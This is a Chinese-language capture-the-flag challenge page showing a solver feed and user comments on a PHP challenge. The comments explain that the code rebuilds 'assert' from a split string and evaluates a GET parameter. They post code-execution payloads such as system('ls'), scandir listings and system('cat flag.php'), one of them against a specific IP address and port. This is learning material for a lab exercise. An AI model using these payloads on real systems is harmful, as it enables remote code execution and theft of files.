评分(11)
解题动态
小白d 攻破了该题 1小时前
嘟嘟dudu 攻破了该题 14小时前
isright 攻破了该题 20小时前
suyifeim4 攻破了该题 21小时前
Macolm 攻破了该题 21小时前
cxkkammt 攻破了该题 22小时前
wangyc 攻破了该题 22小时前
hzydy0_0 攻破了该题 22小时前
ABinsec 攻破了该题 22小时前
J01h 攻破了该题 1天前
bakamu 攻破了该题 1天前
lele1234 攻破了该题 1天前
雀回题 攻破了该题 1天前
1530358725 攻破了该题 1天前
aliezhoo 攻破了该题 2天前
h1165156121 攻破了该题 2天前
wydyxhxs 攻破了该题 2天前
白色狸花猫 攻破了该题 2天前
YN 攻破了该题 2天前
评论
wangsir 17天前
举报
得到assert($_GET['s']),对s赋值找到flag文件
聪仔草莓51 1月前
举报
源码将字符串 a#s#s#e#r#t 按分隔符拆分后重新拼接成函数名 assert,并调用 assert(传入参数)。该函数在旧版本 PHP 中会把传入字符串当作代码执行,因此构造参数即可执行任意 PHP 代码。 利用方式:传入列目录的参数找到 flag 文件名,再传入读取文件的参数获取内容,即可得到本题答案。
西红柿dun牛腩 1月前
举报
这道题目,需要一点基础知识,还需要一些脑洞,初学者不容易想到。很好的学习素材
yiqie 1月前
举报
flag{**********}
icyskin 1月前
举报
http://160.202.254.160:19320/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)
ggsea 2月前
举报
列出当前目录:?s=print_r(scandir('./')),看到flag.txt
lawrencekz 3月前
举报
flag{******}
hwx 3月前
举报
直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg
b2026tf 4月前
举报
本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');
syhaisy 4月前
举报
20702af5309ab1f70e0f7e8a81076a4e